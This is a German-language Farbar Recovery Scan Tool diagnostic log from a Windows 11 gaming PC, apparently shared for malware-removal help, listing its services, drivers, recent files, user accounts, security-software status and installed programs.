S3 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [934368 2022-03-03] (Epic Games Inc. -> Epic Games, Inc.)
S3 FileSyncHelper; C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncHelper.exe [3522992 2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
S3 Futuremark SystemInfo Service; C:\Program Files (x86)\Futuremark\SystemInfo\FMSISvc.exe [347408 2023-11-30] (Underwriters Laboratories Inc. -> Futuremark)
R2 LightKeeperService; C:\Program Files (x86)\MSI\MSI Center\Mystic Light\LightKeeperService.exe [92768 2023-05-10] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [8901528 2024-07-01] (Malwarebytes Inc. -> Malwarebytes)
S3 MBVpnTunnelService; C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe [3073888 2024-06-04] (Malwarebytes Inc. -> Malwarebytes)
R2 MDCoreSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MpDefenderCoreService.exe [1377416 2024-07-16] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 MSIREGISTER_MR; C:\Program Files (x86)\MSI\MSIRegister\MSIRegisterService.exe [2019504 2019-08-28] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.)
R2 MSI_Case_Service; C:\Program Files (x86)\MSI\MSI Center\Case\MSI_Case_Service.exe [74336 2023-07-10] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.)
R2 MSI_Center_Service; C:\Program Files (x86)\MSI\MSI Center\MSI_Central_Service.exe [154216 2023-08-17] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.)
R2 MSI_Companion_Service; C:\Program Files (x86)\MSI\MSI Center\Game Highlights\MSI_Companion_Service.exe [142648 2021-04-08] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.)
R2 MSI_Super_Charger_Service; C:\Program Files (x86)\MSI\MSI Center\Super Charger\MSI_Super_Charger_Service.exe [37104 2022-05-13] (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI)
R2 MSI_VoiceControl_Service; C:\Program Files (x86)\MSI\MSI Center\Voice Control\VoiceControl_Service.exe [36880 2023-04-27] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.)
R2 Mystic_Light_Service; C:\Program Files (x86)\MSI\MSI Center\Mystic Light\Mystic_Light_Service.exe [37616 2022-04-28] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.)
R2 NortonSecurity; C:\Program Files\Norton Security\Engine\22.24.2.6\NortonSecurity.exe [344888 2024-03-04] (NortonLifeLock Inc. -> NortonLifelock Inc.)
R2 nsWscSvc; C:\Program Files\Norton Security\Engine\22.24.2.6\nsWscSvc.exe [1059176 2024-03-04] (NortonLifeLock Inc. -> NortonLifeLock Inc.)
R2 NVDisplay.ContainerLocalSystem; C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_493585427225c794\Display.NvContainer\NVDisplay.Container.exe [1275528 2024-02-08] (NVIDIA Corporation -> NVIDIA Corporation)
S3 OneDrive Updater Service; C:\Program Files\Microsoft OneDrive\24.132.0701.0002\OneDriveUpdaterService.exe [3864080 2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
S3 OverwolfUpdater; C:\Program Files (x86)\Common Files\Overwolf\OverwolfUpdater.exe [2370056 2024-07-23] (Overwolf Ltd -> Overwolf LTD)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\NisSrv.exe [3236728 2024-07-16] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MsMpEng.exe [133688 2024-07-16] (Microsoft Windows Publisher -> Microsoft Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R3 AmdTools64; C:\Windows\System32\drivers\AmdTools64.sys [63392 2020-06-16] (Microsoft Windows Hardware Compatibility Publisher -> )
S3 AppleKmdfFilter; C:\Windows\System32\drivers\AppleKmdfFilter.sys [39272 2023-06-27] (Apple Inc. -> Apple Inc.)
S3 AppleLowerFilter; C:\Windows\System32\drivers\AppleLowerFilter.sys [55608 2023-06-27] (Apple Inc. -> Apple Inc.)
S3 BdDci; C:\Windows\system32\DRIVERS\bddci.sys [800672 2023-10-27] (Microsoft Windows Hardware Compatibility Publisher -> Bitdefender)
R1 BHDrvx64; C:\Program Files\Norton Security\NortonData\22.23.5.106\Definitions\BASHDefs\20231204.001\BHDrvx64.sys [1706512 2023-09-28] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
S3 BthA2dp; C:\Windows\System32\drivers\BthA2dp.sys [532480 2022-05-07] (Microsoft Corporation) [Datei ist nicht signiert]
S3 BthHFEnum; C:\Windows\System32\drivers\bthhfenum.sys [184320 2022-05-07] (Microsoft Corporation) [Datei ist nicht signiert]
S3 BTHMODEM; C:\Windows\System32\drivers\bthmodem.sys [106496 2022-05-07] (Microsoft Corporation) [Datei ist nicht signiert]
R1 ccSet_NGC; C:\Windows\System32\drivers\NGCx64\1618020.006\ccSetx64.sys [198288 2024-03-04] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
S3 CH341SER_A64; C:\Windows\System32\Drivers\CH341S64.SYS [84640 2023-03-21] (Microsoft Windows Hardware Compatibility Publisher -> wch.cn)
R1 CTIIO; C:\Windows\system32\drivers\CtiIo64.sys [32296 2023-08-18] (Microsoft Windows Hardware Compatibility Publisher -> Creative Technology Innovation Co., LTd.)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [527832 2023-08-06] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
S3 EnigmaFileMonDriver; C:\Windows\system32\Drivers\EnigmaFileMonDriver.sys [88736 2024-07-18] (Microsoft Windows Hardware Compatibility Publisher -> EnigmaSoft Limited)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [159720 2023-08-07] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
S3 gdrv3; C:\Windows\System32\drivers\gdrv3.sys [45248 2023-08-18] (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGA-BYTE TECHNOLOGY CO., LTD.)
S3 gzflt; C:\Windows\System32\DRIVERS\gzflt.sys [177056 2021-10-10] (Microsoft Windows Hardware Compatibility Publisher -> BitDefender LLC)
R1 IDSVia64; C:\Program Files\Norton Security\NortonData\22.23.5.106\Definitions\IPSDefs\20231201.064\IDSvia64.sys [1554400 2023-10-19] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
S3 ipadtst2; C:\ProgramData\MSI\Super_Charger\ipadtst2_64.sys [26168 2021-01-12] (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI)
R2 mbamchameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [221264 2024-07-15] (Microsoft Windows Hardware Compatibility Publisher -> Malwarebytes)
S0 MbamElam; C:\Windows\System32\DRIVERS\MbamElam.sys [21480 2024-06-04] (Microsoft Windows Early Launch Anti-Malware Publisher -> Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [239576 2024-07-15] (Microsoft Windows Hardware Compatibility Publisher -> Malwarebytes)
R1 MSIO; C:\Windows\system32\drivers\MsIo64.sys [19000 2023-04-05] (Microsoft Windows Hardware Compatibility Publisher -> MICSYS Technology Co., LTd)
S3 Netaapl; C:\Windows\System32\drivers\netaapl64.sys [23040 2023-08-09] (Microsoft Windows Hardware Compatibility Publisher -> Apple Inc.)
S3 nsvst_NGC; C:\Windows\System32\drivers\NGCx64\1618020.006\nsvst.sys [57120 2024-03-04] (NortonLifeLock Inc. -> NortonLifeLock Inc.)
R3 NTIOLib_CC_Clock; C:\Program Files (x86)\MSI\MSI Center\Lib\NTIOLib_X64.sys [14288 2017-07-10] (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI)
R3 NTIOLib_CC_COMM; C:\Program Files (x86)\MSI\MSI Center\Lib\SYS\NTIOLib_X64.sys [32424 2023-07-31] (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI)
R3 NTIOLib_CC_CPU; C:\Program Files (x86)\MSI\MSI Center\Super Charger\NTIOLib_X64.sys [14288 2017-07-10] (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI)
R3 NTIOLib_MysticLight; C:\Program Files (x86)\MSI\MSI Center\Mystic Light\Lib\NTIOLib_X64.sys [32488 2023-11-20] (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI)
R3 NvModuleTracker; C:\Windows\System32\DriverStore\FileRepository\nvmoduletracker.inf_amd64_0c1cc60a4b422185\NvModuleTracker.sys [45656 2022-07-14] (Nvidia Corporation -> NVIDIA Corporation)
R3 rt68cx21; C:\Windows\System32\DriverStore\FileRepository\rt68cx21x64.inf_amd64_e41dba7ae72d1e1a\rt68cx21x64.sys [458168 2021-10-05] (Microsoft Windows Hardware Compatibility Publisher -> Realtek)
S3 rtcx21; C:\Windows\System32\DriverStore\FileRepository\rtcx21x64.inf_amd64_516e5c9b75c49dc2\rtcx21x64.sys [539648 2022-05-06] (Microsoft Windows -> Realtek)
R3 SRTSP; C:\Windows\System32\drivers\NGCx64\1618020.006\SRTSP64.SYS [960640 2024-03-04] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
R1 SRTSPX; C:\Windows\System32\drivers\NGCx64\1618020.006\SRTSPX64.SYS [52864 2024-03-04] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
R0 SymEFASI; C:\Windows\System32\drivers\NGCx64\1618020.006\SYMEFASI64.SYS [2180248 2024-03-04] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
S0 SymELAM; C:\Windows\System32\drivers\NGCx64\1618020.006\SymELAM.sys [36016 2024-03-04] (Microsoft Windows Early Launch Anti-Malware Publisher -> Broadcom)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [100328 2023-08-07] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
R3 SymEvnt; C:\Program Files\Norton Security\NortonData\22.23.5.106\SymPlatform\SymEvnt.sys [722400 2022-06-28] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
R1 SymIRON; C:\Windows\System32\drivers\NGCx64\1618020.006\Ironx64.SYS [306872 2024-03-04] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
R1 SymNetS; C:\Windows\System32\drivers\NGCx64\1618020.006\symnets.sys [492720 2024-03-04] (Microsoft Windows Hardware Compatibility Publisher -> Broadcom)
S3 Trufos; C:\Windows\System32\DRIVERS\Trufos.sys [633264 2022-04-16] (Microsoft Windows Hardware Compatibility Publisher -> Bitdefender)
S3 UsbNcm; C:\Windows\System32\drivers\UsbNcm.sys [167936 2023-11-15] (Microsoft Windows -> )
S0 WdBoot; C:\Windows\System32\drivers\wd\WdBoot.sys [21968 2024-07-16] (Microsoft Windows Early Launch Anti-Malware Publisher -> Microsoft Corporation)
U5 WdDevFlt; C:\Windows\System32\Drivers\WdDevFlt.sys [169232 2022-05-07] (Microsoft Windows -> Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\wd\WdFilter.sys [602520 2024-07-16] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [105864 2024-07-16] (Microsoft Windows -> Microsoft Corporation)
S3 wpCtrlDrv_NGC; C:\Windows\System32\drivers\NGCx64\1618020.006\wpCtrlDrv.sys [1016792 2024-03-04] (NortonLifeLock Inc. -> NortonLifeLock Inc.)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat (erstellte) (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2024-07-24 22:00 - 2024-07-24 22:00 - 000550849 _____ (glax24 (safezone.cc)) C:\Users\skysc\Downloads\SecurityCheck.exe
2024-07-24 15:04 - 2024-07-24 15:04 - 000000000 ____D C:\Windows\system32\Tasks\Remediation
2024-07-24 13:54 - 2024-07-24 13:54 - 000720434 _____ C:\Windows\system32\perfh007.dat
2024-07-24 13:54 - 2024-07-24 13:54 - 000148474 _____ C:\Windows\system32\perfc007.dat
2024-07-23 15:17 - 2024-07-23 15:17 - 007642872 _____ C:\Users\skysc\Desktop\23.07.2024_15.17.12.zip
2024-07-23 15:16 - 2024-07-23 15:30 - 000017112 _____ C:\Users\skysc\Desktop\Fixlog.txt
2024-07-22 15:43 - 2024-07-22 15:43 - 000002420 _____ C:\Users\skysc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Lunar Client.lnk
2024-07-20 14:26 - 2024-07-20 14:27 - 219475448 _____ (SUPERAntiSpyware) C:\Users\skysc\Downloads\SUPERAntiSpyware.exe

==================== Ein Monat (geänderte) ==================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2024-07-24 22:01 - 2024-05-27 21:26 - 000000000 ____D C:\FRST
2024-07-24 22:01 - 2024-04-14 15:22 - 000002363 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Brave.lnk
2024-07-24 22:01 - 2024-04-14 15:22 - 000002322 _____ C:\Users\Public\Desktop\Brave.lnk
2024-07-24 22:01 - 2024-04-02 21:44 - 000000000 ____D C:\Windows\system32\Tasks\Norton 360
2024-07-24 22:01 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\SystemTemp
2024-07-24 21:55 - 2023-09-19 15:17 - 000000000 ____D C:\Users\skysc\AppData\Local\Overwolf
2024-07-24 21:55 - 2023-08-07 15:06 - 000000000 ____D C:\Program Files (x86)\Steam
2024-07-24 21:55 - 2023-08-07 14:12 - 000000000 ___RD C:\Users\skysc\OneDrive
2024-07-24 21:55 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\AppReadiness
2024-07-24 21:54 - 2024-06-09 14:12 - 000000000 ____D C:\Windows\system32\Tasks\PowerToys
2024-07-24 21:54 - 2023-08-21 17:42 - 000000000 ____D C:\Users\skysc\AppData\Local\CrashDumps
2024-07-24 21:54 - 2022-06-22 10:35 - 000000000 ____D C:\ProgramData\NVIDIA
2024-07-24 21:54 - 2022-06-22 10:16 - 000012288 ___SH C:\DumpStack.log.tmp
2024-07-24 21:54 - 2022-06-22 10:16 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2024-07-24 21:54 - 2022-05-07 07:24 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2024-07-24 16:00 - 2022-05-07 07:17 - 000786432 _____ C:\Windows\system32\config\BBI
2024-07-24 15:58 - 2023-08-08 19:27 - 000000000 ____D C:\Users\skysc\AppData\Local\Norton
2024-07-24 15:46 - 2024-06-04 17:30 - 000000000 ____D C:\Users\skysc\AppData\Local\Malwarebytes
2024-07-24 15:41 - 2023-08-07 17:42 - 000000000 ____D C:\Users\skysc\AppData\Roaming\.minecraft
2024-07-24 15:40 - 2023-08-07 14:18 - 000000000 ____D C:\Users\skysc\AppData\Local\D3DSCache
2024-07-24 15:35 - 2023-08-08 23:11 - 000000000 ____D C:\Users\skysc\AppData\Roaming\vlc
2024-07-24 14:39 - 2022-05-07 07:24 - 000000000 ___HD C:\Program Files\WindowsApps
2024-07-24 13:54 - 2022-06-22 10:23 - 001660532 _____ C:\Windows\system32\PerfStringBackup.INI
2024-07-24 13:54 - 2022-05-07 07:22 - 000000000 ____D C:\Windows\INF
2024-07-24 12:53 - 2024-05-25 20:06 - 000002246 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2024-07-24 12:53 - 2024-05-25 20:06 - 000002205 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2024-07-24 12:53 - 2023-09-19 15:20 - 000000000 ____D C:\Program Files (x86)\Overwolf
2024-07-24 12:52 - 2022-06-22 10:16 - 000000000 ____D C:\Windows\system32\SleepStudy
2024-07-23 23:31 - 2023-11-11 18:24 - 000000000 ____D C:\Users\skysc\AppData\Roaming\discord
2024-07-23 15:17 - 2023-08-08 22:03 - 000000000 ____D C:\Users\skysc\AppData\LocalLow\Temp
2024-07-22 19:50 - 2023-08-09 20:01 - 000000000 ____D C:\Users\skysc\OneDrive\Microsoft Edge Drop Files\Dokumente\Audioaufzeichnungen
2024-07-22 15:43 - 2023-08-07 14:12 - 000000000 ____D C:\Users\skysc
2024-07-22 14:42 - 2022-05-07 07:17 - 000032768 _____ C:\Windows\system32\config\ELAM
2024-07-20 21:23 - 2024-06-02 18:45 - 000001607 _____ C:\Windows\system32\config\VSMIDK
2024-07-20 21:23 - 2023-08-08 14:20 - 000000000 ____D C:\Program Files\Microsoft OneDrive
2024-07-20 17:58 - 2022-06-22 10:18 - 000000000 ____D C:\ProgramData\Packages
2024-07-20 15:58 - 2023-08-07 17:35 - 000000000 ____D C:\XboxGames
2024-07-20 15:58 - 2023-08-07 14:18 - 000000000 ____D C:\Users\skysc\AppData\Local\Packages
2024-07-20 15:31 - 2023-11-09 14:14 - 000003596 _____ C:\Windows\system32\Tasks\OneDrive Reporting Task-S-1-5-21-1221853621-2447620182-1933698513-1002
2024-07-20 15:31 - 2023-08-07 14:20 - 000003596 _____ C:\Windows\system32\Tasks\OneDrive Reporting Task-S-1-5-21-1221853621-2447620182-1933698513-1001
2024-07-20 15:31 - 2022-06-22 10:19 - 000003194 _____ C:\Windows\system32\Tasks\OneDrive Per-Machine Standalone Update Task
2024-07-20 15:31 - 2022-06-22 10:19 - 000002155 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2024-07-20 14:52 - 2024-05-27 21:44 - 000000000 ____D C:\Users\skysc\AppData\Local\Google
2024-07-20 14:48 - 2024-05-22 20:55 - 000002443 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2024-07-20 14:48 - 2024-05-22 20:55 - 000002281 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2024-07-20 14:39 - 2022-05-07 07:24 - 000000000 ___HD C:\Windows\ELAMBKUP
2024-07-19 20:47 - 2024-04-14 15:22 - 000004024 _____ C:\Windows\system32\Tasks\BraveSoftwareUpdateTaskMachineUA{A5CFE2E1-9623-44C3-B3C8-B178FBF5D7D2}
2024-07-19 20:47 - 2024-04-14 15:22 - 000003900 _____ C:\Windows\system32\Tasks\BraveSoftwareUpdateTaskMachineCore{DFB371DD-43E6-4228-ACFE-FADEACBD0C31}
2024-07-18 14:31 - 2023-11-11 18:24 - 000002002 _____ C:\Users\skysc\Desktop\Discord.lnk
2024-07-17 19:25 - 2024-05-27 21:48 - 000000000 ____D C:\Users\skysc\AppData\Local\GUI
2024-07-17 16:49 - 2022-06-22 10:36 - 000000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2024-07-16 17:08 - 2024-02-17 14:40 - 000267880 _____ (Microsoft Corporation)
C:\Windows\system32\gamingservicesproxy_4.dll 2024-07-16 17:08 - 2023-08-07 17:35 - 002799208 _____ (Microsoft Corporation) C:\Windows\system32\xgameruntime.dll 2024-07-16 17:08 - 2023-08-07 17:35 - 000751208 _____ (Microsoft Corporation) C:\Windows\system32\gameplatformservices.dll 2024-07-16 17:08 - 2023-08-07 17:35 - 000222816 _____ (Microsoft Corporation) C:\Windows\system32\gameconfighelper.dll 2024-07-16 17:08 - 2023-08-07 17:35 - 000206440 _____ (Microsoft Corporation) C:\Windows\system32\gamelaunchhelper.dll 2024-07-16 17:08 - 2023-08-07 17:35 - 000145000 _____ (Microsoft Corporation) C:\Windows\system32\gamingtcuihelpers.dll 2024-07-16 17:08 - 2023-08-07 17:35 - 000108136 _____ (Microsoft Corporation) C:\Windows\system32\xgamehelper.exe 2024-07-16 17:08 - 2023-08-07 17:35 - 000075368 _____ (Microsoft Corporation) C:\Windows\system32\xgamecontrol.exe 2024-07-16 15:17 - 2022-06-22 10:16 - 000000000 ____D C:\Windows\system32\Drivers\wd 2024-07-15 17:42 - 2024-06-04 17:29 - 000239576 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys 2024-07-12 15:57 - 2022-06-22 10:16 - 000474232 _____ C:\Windows\system32\FNTCACHE.DAT 2024-07-12 15:56 - 2023-12-14 23:09 - 000000000 ____D C:\Windows\InboxApps 2024-07-12 15:56 - 2023-10-11 20:19 - 000000000 ____D C:\Windows\system32\Microsoft-Edge-WebView 2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ___RD C:\Windows\ImmersiveControlPanel 2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\UUS 2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\SysWOW64\WinMetadata 2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\SystemResources 2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\system32\WinMetadata 2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\system32\Sgrm 2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\system32\SecureBootUpdates 2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\system32\oobe 2024-07-12 
15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\ShellExperiences 2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\ShellComponents 2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\Provisioning 2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\PolicyDefinitions 2024-07-12 15:56 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\bcastdvr 2024-07-12 14:43 - 2022-06-22 10:16 - 000003754 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA 2024-07-12 14:43 - 2022-06-22 10:16 - 000003630 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore 2024-07-11 14:49 - 2022-05-07 07:24 - 000000000 ____D C:\Windows\ServiceState 2024-07-09 20:55 - 2022-05-07 07:24 - 000000000 ____D C:\ProgramData\USOPrivate 2024-07-09 20:51 - 2023-08-07 17:05 - 000000000 ____D C:\Windows\system32\MRT 2024-07-09 20:50 - 2023-08-07 17:05 - 194135240 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe 2024-07-09 20:44 - 2022-05-07 07:17 - 000000000 ____D C:\Windows\CbsTemp 2024-07-09 20:42 - 2022-06-22 10:19 - 003212800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PrintConfig.dll 2024-07-01 18:05 - 2024-05-29 17:26 - 000000000 ____D C:\Users\skysc\AppData\LocalLow\Norton 2024-06-30 20:23 - 2023-08-20 18:23 - 000000000 ____D C:\Users\skysc\AppData\Roaming\Microsoft\Word 2024-06-27 14:17 - 2024-05-28 21:28 - 000000000 ____D C:\ProgramData\Avast Software 2024-06-26 21:39 - 2023-08-13 22:30 - 000000000 ____D C:\Users\skysc\AppData\Roaming\Code 2024-06-24 14:31 - 2023-08-13 22:30 - 000000000 ____D C:\Users\skysc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Visual Studio Code 2024-06-24 14:24 - 2024-05-23 16:54 - 000049704 _____ C:\Users\skysc\Downloads\Lebenslauf Jessika.pdf 2024-06-24 14:08 - 2024-06-18 19:47 - 000038589 _____ C:\Users\skysc\Downloads\Bewerbung Jessika.pdf ==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ======== 2023-10-22 18:46 - 2023-10-22 18:46 - 000000028 _____ () 
C:\Users\skysc\AppData\Local\CapCutConfigure.ini
2023-10-22 20:57 - 2023-10-22 20:57 - 000001611 _____ () C:\Users\skysc\AppData\Local\recently-used.xbel
2024-05-25 19:34 - 2024-05-25 19:34 - 000000017 _____ () C:\Users\skysc\AppData\Local\resmon.resmoncfg

==================== SigCheck ============================
(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

==================== Ende von FRST.txt ========================

Addition Log:

FRST Additions Logfile:
Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 24.07.2024
durchgeführt von skysc (24-07-2024 22:02:24)
Gestartet von C:\Users\skysc\Downloads\Neuer Ordner
Microsoft Windows 11 Home Version 23H2 22631.3880 (X64) (2023-08-07 12:09:18)
Start-Modus: Normal
==========================================================

==================== Konten: =============================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

Administrator (S-1-5-21-1221853621-2447620182-1933698513-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1221853621-2447620182-1933698513-503 - Limited - Disabled)
Gast (S-1-5-21-1221853621-2447620182-1933698513-501 - Limited - Disabled)
skysc (S-1-5-21-1221853621-2447620182-1933698513-1001 - Administrator - Enabled) => C:\Users\skysc
WDAGUtilityAccount (S-1-5-21-1221853621-2447620182-1933698513-504 - Limited - Disabled)
zweisky (S-1-5-21-1221853621-2447620182-1933698513-1002 - Limited - Enabled) => C:\Users\zweisky

==================== Sicherheits-Center ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Norton 360 for Gamers (Disabled - Out of date) {AECE2126-F4E7-6909-11F2-1B69D1FBCBD0}
FW: Norton 360 for Gamers (Disabled) {96F5A003-BE88-6851-3AAD-B25C2F288CAB}

==================== Installierte Programme ======================
(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

AMD Chipset Software (HKLM-x32\...\AMD_Chipset_IODrivers) (Version: 2.10.26.336 - Advanced Micro Devices, Inc.)
AMD GPIO2 Driver (HKLM-x32\...\{E9DD399F-21A3-479E-A7DF-D6CF4B2ADBF3}) (Version: 2.2.0.130 - Advanced Micro Devices, Inc.)
Hidden AMD PCI Driver (HKLM-x32\...\{80EC3CEE-2940-42A1-A776-B5D810D39F1E}) (Version: 1.0.0.81 - Advanced Micro Devices, Inc.) Hidden AMD PSP Driver (HKLM-x32\...\{988F14B8-79A8-475D-BAC7-83F96AD3D821}) (Version: 4.13.0.0 - Advanced Micro Devices, Inc.) Hidden AMD Ryzen Balanced Driver (HKLM-x32\...\{A171D320-C42C-4F3B-A2D8-C6A09F6788CC}) (Version: 6.0.0.7 - Advanced Micro Devices, Inc.) Hidden AMD Ryzen Master SDK (HKLM\...\{DBD50508-5F75-416B-995D-C42433A00944}) (Version: 2.10.0.2198 - Advanced Micro Devices, Inc.) AMD SBxxx SMBus Driver Alpha (HKLM-x32\...\{AAE0E27D-C88A-49BA-8715-77ADCD4286A3}) (Version: 5.12.0.38 - Advanced Micro Devices, Inc.) Hidden AMD_Chipset_Drivers (HKLM-x32\...\{b7b5b85e-6364-4ab4-ab0f-3a89b0de0fe2}) (Version: 2.10.26.336 - Advanced Micro Devices, Inc.) Hidden Autodesk Fusion 360 (HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\73e72ada57b7480280f7a6f4a289729f) (Version: 2.0.16976 - Autodesk, Inc.) blender (HKLM\...\{1589EDDA-7F97-49A7-A931-5646B819BC9E}) (Version: 4.1.0 - Blender Foundation) Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.) Brave (HKLM-x32\...\BraveSoftware Brave-Browser) (Version: 127.1.68.128 - Die Brave-Autoren) CapCut (HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\CapCut) (Version: 2.6.0.814 - Bytedance Pte. Ltd.) Combo Cleaner (HKLM\...\{8C9F8853-52F7-46F3-BC78-98001D3FF40C}) (Version: 1.0.63.0 - RCS LT) Hidden Combo Cleaner (HKLM-x32\...\InstallShield_{8C9F8853-52F7-46F3-BC78-98001D3FF40C}) (Version: 1.0.63.0 - RCS LT) CrystalDiskInfo 9.2.3 (HKLM\...\CrystalDiskInfo_is1) (Version: 9.2.3 - Crystal Dew World) CurseForge (HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Overwolf_cchhcaiapeikjbdbpfplgmpobbcdkdaphclbmkbj) (Version: 1.256.3.1 - Overwolf app) Discord (HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Discord) (Version: 1.0.9023 - Discord Inc.) 
